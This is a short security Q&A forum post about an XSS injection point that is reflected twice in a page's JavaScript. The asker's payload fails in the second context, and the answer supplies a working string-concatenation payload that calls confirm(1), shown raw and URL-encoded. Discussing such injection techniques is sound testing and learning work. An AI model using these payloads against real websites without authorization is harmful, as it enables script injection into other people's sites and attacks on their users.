# Triggering a XSS when the payload appears twice?

Tags: web-application, xss

I have found a XXS vulnerability, but I am not able to exploit it. My input, `66038');}confirm(1);/*`, appears two times. The idea was to close the function `foo1()` and trigger `confirm(1)`. But `foo2` is the problem. It is not possible to initialize `foo_var` with the same payload. The character `)` is the problem. Any ideas?

```
function foo1(){

    if('EUR66038');}confirm(1);/* != 'blabla'



 /*
    Some comments
   */


function foo2()
{
    var foo_var= 'EUR66038');}confirm(1);/* //Comment
...
```

Answer (score 1):

The following payload will work:

```
EUR66038'+confirm(1)+'820
```

Encoded version:

```
EUR66038%27%2Bconfirm(1)%2B%27820
```